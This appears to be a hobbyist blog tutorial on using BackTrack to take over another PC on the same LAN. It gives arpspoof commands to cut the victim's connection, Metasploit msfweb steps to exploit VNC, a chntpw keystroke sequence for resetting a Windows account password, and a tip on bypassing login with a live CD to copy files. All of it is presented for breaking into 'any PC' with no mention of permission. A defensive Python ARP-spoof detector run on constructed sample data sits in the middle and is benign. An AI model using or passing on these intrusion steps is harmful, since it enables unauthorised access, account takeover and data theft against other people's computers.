Hi friends. As I have been messing with the BackTrack OS for the past two days, I have decided to post some tutorials on hacking with BackTrack. So here is a small trick on BackTrack that allows you to hack any PC connected to the LAN and lets you change the password of the remote PC.
At first, disable the internet connection of the remote system:
1. arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
2. Ctrl+2 to stop.
Then Metasploit VNC:
1. Nmap -> nmap 192.168.1.1
2. Backtrack -> penetration -> framework2 -> msfweb
3. Then copy [127.0.0.1:5555]
4. Open a browser, paste it in the URL bar, and then exploit VNC.
Now reset the password on Windows XP and Vista (old trick but still gold):
Start -> Backtrack -> privilege escalation -> password attacks -> chntpw
chntpw -i /mnt/hda1/windows/system32/config/SAM
1 (Enter)
Username (Enter)
1 (Enter)
Username (Enter)
4 (Enter)
1 (Enter)
Q (Enter)
Y (Enter)
Done :)
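From the defender's side, here is an added example that is not part of the original post: a small Python ARP watcher that flags when an IP already seen with one MAC address (the gateway 192.168.1.1 in the steps above) starts answering from a different MAC, which is the footprint the arpspoof step leaves on the LAN. The ArpWatch and scan names are my own, and the replies are constructed sample data rather than a real capture.

```python
# Added example (not from the original post): a tiny ARP-spoof detector.
# It tracks which MAC each IP has claimed in ARP replies and alerts when
# the mapping changes. On a real host you would feed it frames from a
# sniffer; here the replies are constructed sample data.
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "sender_ip sender_mac")


class ArpWatch:
    """Remember the first MAC seen for each IP and flag later conflicts."""

    def __init__(self, protected_ips=()):
        self.table = {}                        # ip -> first MAC observed
        self.protected = set(protected_ips)    # e.g. the default gateway
        self.alerts = []

    def observe(self, reply):
        known = self.table.get(reply.sender_ip)
        if known is None:
            self.table[reply.sender_ip] = reply.sender_mac.lower()
            return None
        if known == reply.sender_mac.lower():
            return None
        # Same IP, different MAC: classic ARP cache poisoning symptom.
        severity = "high" if reply.sender_ip in self.protected else "medium"
        alert = {"ip": reply.sender_ip, "expected_mac": known,
                 "seen_mac": reply.sender_mac.lower(), "severity": severity}
        self.alerts.append(alert)
        return alert


def scan(replies, protected_ips=()):
    """Run a batch of ARP replies through the watcher; return all alerts."""
    watcher = ArpWatch(protected_ips)
    for reply in replies:
        watcher.observe(reply)
    return watcher.alerts


# Constructed sample traffic (hypothetical MAC addresses).
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "00:11:22:33:44:55"),  # real gateway
    ArpReply("192.168.1.2", "aa:bb:cc:dd:ee:01"),  # target host
    ArpReply("192.168.1.1", "de:ad:be:ef:00:01"),  # spoofer claims gateway IP
    ArpReply("192.168.1.1", "de:ad:be:ef:00:01"),  # repeated poison reply
    ArpReply("192.168.1.2", "aa:bb:cc:dd:ee:01"),  # unchanged, no alert
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_REPLIES, protected_ips={"192.168.1.1"}):
        print(alert)
```

Static ARP entries for the gateway, or a switch with dynamic ARP inspection, stop the poisoning itself; this watcher only tells you it is happening.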
A note to the novice: in case all you need is to get some files off the computer, there's an easier method. Just boot via any live CD. This way the computer starts using the OS on the CD and the password-protected OS is bypassed. Comment if you need info on this method.
I'll come up with a proper intro to BackTrack in later articles.
Tips:
If you want to be a backtracker, create a live bootable BackTrack on your USB and use it as much as you can.
NOTE: If all you want to do is get into the system and take out a few files, you can simply bypass the password-protected OS with the live CD of some other OS (example: Ubuntu).